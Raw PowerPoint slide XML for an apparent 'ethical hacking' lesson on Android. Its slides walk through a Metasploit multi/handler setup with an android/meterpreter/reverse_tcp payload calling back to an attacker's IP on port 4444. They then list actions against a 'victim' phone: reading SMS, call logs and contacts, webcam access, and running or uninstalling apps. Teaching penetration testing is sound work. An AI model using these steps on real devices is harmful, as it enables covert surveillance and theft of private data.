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8" r:id="rId4"/>
    <p:sldId id="262" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="257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8516-78C0-C031-F574-6937641CA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ED7A9-33EA-532D-FFEF-72FD4C1F8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707A3-2C15-729F-C2DE-D51A3BDE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64066-C076-BF59-704D-BF448A3D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850EE-C95D-3F3F-C506-3D0E9109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417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B247-44E1-79C8-A78D-E86E9C9D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C40AE-1F7F-650C-A2A4-14DBE9596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0296-8906-EEDC-7F61-20691844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60C3A-EC74-C59D-DB75-11E50D6A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26D8-1939-A931-AA2B-6BDA3C23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857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9A715-BF01-2D67-6993-07591DF61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7D1E8-7A28-7864-A025-7CFA3B6B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D6D6-A0B2-1E2A-C285-215DEAD6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52CEC-875A-83F7-1612-0CDD57B8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8DEE-0C05-1075-E7E3-B18394D0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358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473-A507-9A1E-0604-971D05B8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B4778-69B4-C1A7-8EBE-0D3C60733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0BF4-EE4B-6DAB-954C-587D61C1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572D-88CC-BA79-EEF3-BCDD963A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CDE5-99FA-6230-E452-88D02B77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76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0C88-C068-8E64-9665-64600906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19301-DA80-AC78-4227-D2C0D4D3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DD2F-13A5-636C-33F6-6A9D6C9B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0B7E0-7A71-3054-C1F2-1D179658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B73C-046B-55D4-68BC-E0CC40CD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348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C2E5-BCDA-7FF8-789D-EAC93510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C7D7-582C-12C5-DEE8-4B5237B8A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7A900-5C44-04D5-CF5B-BBA74ADA9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5B84F-F3C8-D8C7-AD6E-91A40E5B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16975-D79F-DF75-E2FD-F8B9CEC4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CC16E-2A49-A1DD-FCA9-6F00CB66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511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75AC-57FD-3B73-438F-3557DED9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1CD12-066D-D556-D00F-3E51D3D57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B0513-04FC-5A34-69CD-4EE4A8E76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FB1BB-0FC5-45F5-8B6B-4F816A6B1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59EF5-7C8A-622C-CB9D-5DFB4AD59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2F019-260B-91C4-91A4-4AC01040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CB7A6-1932-65E5-CF8B-BF1B974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37136-4BCA-7242-2BD4-EFAB147D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812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3150-51CB-9F45-3FD7-883ACFBF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4A7D5-2930-A452-8446-A3058460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FC8EA-8418-87EF-72E3-C150C11E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1AD98-1B7F-6BB2-60C5-4EA43AA7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679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1781A-2767-4720-57D9-E07C0BAC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9B4FA-FBF2-D9D3-C3EA-628E38E2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69076-CE6F-EC20-4E9C-A5F383B8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23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9F91-9657-BDF8-203C-656538D0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BA5-190C-10F4-0FE1-1D2F050D5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7395-FDD7-A458-EA2E-5F16779EE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07DD1-C5BD-1E25-F214-0441586F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7A066-E45C-B2E9-1CC8-AE6A43FCE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654E6-0E57-F176-75FB-D5556504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906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5A1E-7C86-0517-1DE7-F435A43D4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960DE-430A-E562-D527-F44F0B337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75182-1504-BBE8-3816-21628A20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1382-10A9-C8B7-BC70-A494107F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7FEEB-A009-42E6-EB90-E9A901DB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93AA4-1C27-4020-19DF-545C8256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795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3649F-726F-492B-FCA8-5C839DA2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225A3-6319-2807-42F4-BD4ADE28F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66D6-232A-5321-DD8C-58907B017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1B9D-DADD-4CC0-90A5-CAA388961C15}" type="datetimeFigureOut">
              <a:rPr lang="en-PH" smtClean="0"/>
              <a:t>27/09/2024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A0B2-A4F1-5125-8563-128F4F87C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B84FE-19A9-2C71-E0B6-256991861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D9D71-ADE1-44C2-8606-A75C0E9CE4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94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D7BCA1-71AB-D666-D073-3F37216A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86" y="1566224"/>
            <a:ext cx="8572500" cy="4762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7EBC18-9A56-E554-4DBB-A768CE443074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931736" y="744717"/>
            <a:ext cx="655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>
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacking the Android System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220961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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A1BC95F-366C-05B0-2753-6157F9E7B55C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1574" y="1642608"/>
            <a:ext cx="5681520" cy="4202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C4CF6F-D78A-C2DD-3767-1A1CC64BE5C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681573" y="1014725"/>
            <a:ext cx="4524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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-PH" sz="2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3BD0E-5B24-8270-CA31-AAF0EE4A1B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164972" y="256181"/>
            <a:ext cx="6094428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IV. Maintaining Access </a:t>
            </a:r>
            <a:endParaRPr lang="en-PH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1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7A0AD6-CDEC-FA15-FFA8-45A552EF1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00" y="3522044"/>
            <a:ext cx="9202656" cy="298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2ECB0-374B-3F14-2FD4-A94CCD3F528D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164972" y="256181"/>
            <a:ext cx="6094428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IV. Maintaining Access </a:t>
            </a:r>
            <a:endParaRPr lang="en-PH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1259A-37F1-DD79-062D-61022C230865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="821399" y="1145118"/>
            <a:ext cx="10773569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9017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Start the exploit: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First run the command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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use multi/handler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to use the multi handler module. Next is to set the payload and run the command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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set PAYLOAD android/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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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.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After the payload has been set successfully, set the LHOST to the attacker’s IP address run the command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>i.p.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> address&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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next is setting the LPORT run the command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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set LPORT 4444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and lastly, run the command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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exploit </a:t>
            </a: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to start the penetration exploit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PH" sz="16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64982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8E07C-6AD4-D043-8180-F1099F498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45" y="1708408"/>
            <a:ext cx="8560569" cy="1559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B0AFD-02B2-03C3-0F67-4CA47E70853A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="164972" y="256181"/>
            <a:ext cx="6094428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IV. Maintaining Access </a:t>
            </a:r>
            <a:endParaRPr lang="en-PH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EE8-A640-B60D-699F-77C71FFB9C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447545" y="1117775"/>
            <a:ext cx="4637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/>
              <a:t>Using the victim’s I.P. Address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B8994E-8566-4696-9838-4F166D80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88" y="4396618"/>
            <a:ext cx="7347895" cy="1559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0D285A-C2CF-59E2-3977-99319C757C20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447545" y="3805985"/>
            <a:ext cx="4637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/>
              <a:t>Begin the Exploitation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29110B-8F60-5E7D-68D7-9F7400DF165A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661057" y="6115724"/>
            <a:ext cx="11196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Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>’s device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> should immediately receive the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>” session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>.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285015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7308E-EFBC-D4A2-D110-57375F80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95" y="1024627"/>
            <a:ext cx="6059697" cy="17605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915B0-2DE5-42ED-F558-6770E73D460A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259008" y="195520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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the Victim’s System Information and Hardware Peripherals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27A948-2C5F-6BFE-6348-BE943798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51" y="4867905"/>
            <a:ext cx="5173577" cy="1930936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7927402-D1E9-1487-286F-40C149FE28F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="281202" y="1002433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0CB07C3-CD4A-FB88-00E7-16A247E8A50D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="321299" y="5087917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C62804C-6AD2-46C3-1403-80AF07B0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94" y="2970132"/>
            <a:ext cx="776951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Check the root status of the device.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check_root</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-PH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5" name="Image 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532E4D9B-BB17-DFE9-846B-47B5F4F7FD1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67" y="3429000"/>
            <a:ext cx="3736384" cy="61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66F2A293-7A90-9A8E-128A-E74DA7F5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62" y="373602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97695F-6D63-4444-6A0B-7BDB9A544757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="355387" y="3325445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3EBA229-232A-4E24-D0C9-ADD68B400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79" y="4375826"/>
            <a:ext cx="455263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H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Know if there is available camera.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-PH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H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113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FB077F-B702-7337-FED1-AE8465A9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75" y="1534150"/>
            <a:ext cx="4596216" cy="10116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5AF0C1-389C-545B-7342-7C006727A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95" y="3439652"/>
            <a:ext cx="6264760" cy="1556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0A1DF-8B87-ADB3-A25D-64532C112DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259008" y="195520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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the Victim’s System Information and Hardware Peripherals :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FC95C59F-5E10-2804-1AE6-B56FDA617639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="378321" y="1603696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909A3-CE1E-15C9-3753-646EB6326C8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259008" y="2790062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/>
              <a:t>Getting the Call Logs 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CB7FB-7C8F-59E3-41FF-84DACF27B8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269388" y="964156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/>
              <a:t>Access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH" sz="2200" b="1" dirty="0" err="1"/>
              <a:t>WebCam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH" sz="2200" b="1" dirty="0"/>
              <a:t> :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A92F030-B8CF-E885-F51F-E252C5F58F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="367941" y="3574193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00A002D-99C4-4743-EF9F-3859EA066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71" y="5174811"/>
            <a:ext cx="80410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 MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Exploit the contacts of the device.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-PH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124" name="Image 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832F6F6E-9501-2105-7A36-CEC89560A60A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014" y="5852296"/>
            <a:ext cx="6840809" cy="95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E046A076-D24B-B38A-501F-05F6E164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1CCC8D3-F25C-AEBD-64F2-1224E86B8377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="378321" y="5755740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7296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C1F527-20DE-30EB-E8DB-B6E1BEFC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26" y="4285929"/>
            <a:ext cx="10287234" cy="1418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B98B5-3B5F-DD40-CE0F-3824168C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26" y="1625890"/>
            <a:ext cx="8153873" cy="1558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70C9B-E5A1-8EA3-FC45-1208DCA964B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259008" y="195520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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the Victim’s System Information and Hardware Peripherals :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9ACA5F9-E169-2954-8E57-3DFF429AC2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="453736" y="1631742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F85110-1E63-FAFB-94F8-3A90F27E53C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354229" y="993583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/>
              <a:t>Read SMS Messages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722FC-F45C-76DF-91CA-3D5674638144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354228" y="3688584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/>
              <a:t>Send Message to the Victim :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202B354-0391-488D-93C3-F01784C6EE1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="527776" y="4693919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5296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980C2-373C-4482-B98A-1E5B5550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28" y="1678524"/>
            <a:ext cx="9233503" cy="4693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C7A2A2-9579-EB48-A349-D1A1D0FFBF0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259008" y="195520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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the Victim’s System Information and Hardware Peripherals :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55CAB80-2767-FFE7-E840-B6594EDB1022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="669178" y="2014549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2E8B4-0703-7857-5D6D-008186B5D74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354229" y="993583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/>
              <a:t>Get the List of Applications from the Victim’s Device:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2586018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3E7E9-4194-1CEE-F932-55903DB3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95" y="1791646"/>
            <a:ext cx="9913285" cy="1684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414605-0600-35AA-EDBC-27B2671FDAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259008" y="195520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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hack the Victim’s System Information and Hardware Peripherals :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B314277-46E4-1DD2-C7FA-5495AE9B0A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="678606" y="2197057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3147A-88DA-CEBC-D548-A2363FDFEDE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354229" y="993583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/>
              <a:t>Run an Application from the Victim’s Device:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EBA3956-AC8E-0655-E384-8CDBEA4F26F2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7299" y="4622138"/>
            <a:ext cx="7498521" cy="807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0619C7-E945-FBF2-8C0B-01D28940AA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440641" y="4055753"/>
            <a:ext cx="95260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200" b="1" dirty="0"/>
              <a:t>You may also uninstall an Application from the Victim’s Device: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0769686-E1A6-9AD6-F14F-C95A82888B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="752645" y="4630628"/>
            <a:ext cx="386499" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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817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8B91D8-366D-E1E2-6005-EE716805E8D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452868" y="2124458"/>
            <a:ext cx="10332353" cy="23237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374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>By the end of this lesson, students will be able to:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1) Execute ethical hacking in android environment.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2) Use kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> and other tools to conduct ethical hacking.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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19832A-F0F2-4264-FB22-938F661D88AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-48125" y="-52136"/>
            <a:ext cx="12304293" cy="1436581"/>
            <a:chOff x="-48125" y="-52136"/>
            <a:chExt cx="12304293" cy="1436581"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rounded Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B561110E-6481-B5AD-6B00-EBC668A29E75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="352927" y="393845"/>
              <a:ext cx="11903241" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4498E4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3EE7880B-D8C0-A474-C529-05E2A76D1E1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-48125" y="-52136"/>
              <a:ext cx="11903241" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect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Intended Learning Outcomes (ILO)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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ounded Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB18E61-335F-8C51-9E64-FF83AE935E9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="136359" y="164432"/>
              <a:ext cx="11903241" cy="99060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INTENDED LEARNING OUTCOMES</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="25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142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48146-C0C5-7BA2-6C67-778AAC17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354" y="2322478"/>
            <a:ext cx="2746391" cy="27463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C0CB37-D673-4C52-FD80-96440D0C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28" y="2419719"/>
            <a:ext cx="4432038" cy="2513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903BA-DEB1-C01B-7104-2C74C67B3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60" y="2322478"/>
            <a:ext cx="3380306" cy="2349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23CC11-16C8-12C2-45C0-D8C78A1CAD7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248939" y="434376"/>
            <a:ext cx="9373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of all, Setup the Connection. Make sure the victim is connected to the hacker’s network.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CE9531-EE3E-659B-D292-D31D7C4E708D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4458879" y="3384223"/>
            <a:ext cx="820132" cy="254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85EFA3C-7D71-30B4-4265-77FA87E3E503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8379166" y="3421931"/>
            <a:ext cx="820132" cy="254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F1A130A-B30B-1FB2-F7D8-232D88C023A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8379166" y="3847339"/>
            <a:ext cx="820132" cy="254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3D82A0-A067-6AA1-BA72-2E513AED049D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4390200" y="3798828"/>
